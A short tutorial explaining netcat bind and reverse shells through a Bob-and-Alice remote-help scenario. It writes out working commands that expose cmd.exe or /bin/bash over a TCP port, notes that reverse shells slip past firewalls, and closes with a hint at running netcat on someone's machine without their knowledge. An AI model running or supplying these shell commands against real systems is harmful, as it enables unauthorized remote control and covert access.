/Bind Shell and Reverse Shell

Bind Shell and Reverse Shell

Bind Shell :
Is mainly a method for remote administration , you could bind an application to a TCP/UDP port , any machine that connects to this box will be presented the application you binded with the same privileges of the user that binded the application . Through “Netcat” that redirects the standard input , output and error to the port rather than the default console.
Here’s an example to make things clear:

 
Now Bob (windows box) wants Alice to help with something so all bob has to do is bind his shell to a port and Alice will connect to this port Allowing her to control his machine.
Alright so here goes the common scenario :
Bob’s Machine :
nc -lvvp 1234 -e cmd.exe

 
Inbrief : -netcat listen verbous verbous to port 1234(or whatever you’ll choose) and execute cmd.exe .
 
Now at Alice’s :
She’ll simply connect to Bob’s machine through the defined port
nc -v 192.168.1.4 1234
//note that if you’re not on the same local it has to be The public IP not a private one “refer to the first photo”.
Once Alice is connected the second line in the above image will show at Bob’s and Alice will be presented the cmd.exe to play around.

 
Reverse Shell :
Now , we’ll say that Alice is the one who need help , But like you’ve noticed Alice is behined a NAT so she cant just bind her bash and expect Bob to connect , Luckily netcat allows Alice to Send her shell to Bob , so again Bob will just listen
Bob’s :
nc -lvvp 1234
//no need for a picture 😀
Alice’s:
nc -v 192.168.1.4 1234 -e /bin/bash

 
 
Once Alice is connected Bob will be presented her shell : as you can see I tried some commands to test it

 
the good thing about a reverse the shell is that a firewall probably wont detect it unless it’s set to filter both incoming and outcoming traffic.
That’s a whole basic idea of Reverse and bind shells
Now consider this
What if both Alice and Bob are behind a NAT how will they connect? //hint:no-ip.com
if I want to ..well..have netcat run on Alice’s machine without her knowing //no hints!
I’ll leave that to your research instinct 🙂